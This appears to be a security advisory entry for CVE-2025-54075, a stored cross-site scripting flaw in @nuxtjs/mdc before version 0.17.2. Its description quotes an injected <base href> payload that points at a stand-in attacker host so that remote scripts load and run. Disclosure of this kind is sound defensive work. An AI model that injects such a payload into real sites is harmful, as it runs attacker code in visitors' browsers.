PT-2025-30053 · Unknown · @Nuxtjs/Mdc

Vozec

·

Published

2025-07-18

·

Updated

2025-07-20

·

CVE-2025-54075

CVSS v3.1

8.3

High

VectorAV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Name of the Vulnerable Software and Affected Versions @nuxtjs/mdc versions prior to 0.17.2
Description A remote script-inclusion / stored cross-site scripting issue exists in @nuxtjs/mdc. A Markdown author can inject a <base href="https://attacker.tld"> element, which rewrites how relative URLs are resolved. This allows an attacker to load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context.
Recommendations Update @nuxtjs/mdc to version 0.17.2 or later.

Exploit

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2025-54075
GHSA-CJ6R-RRR9-FG82

Affected Products

@Nuxtjs/Mdc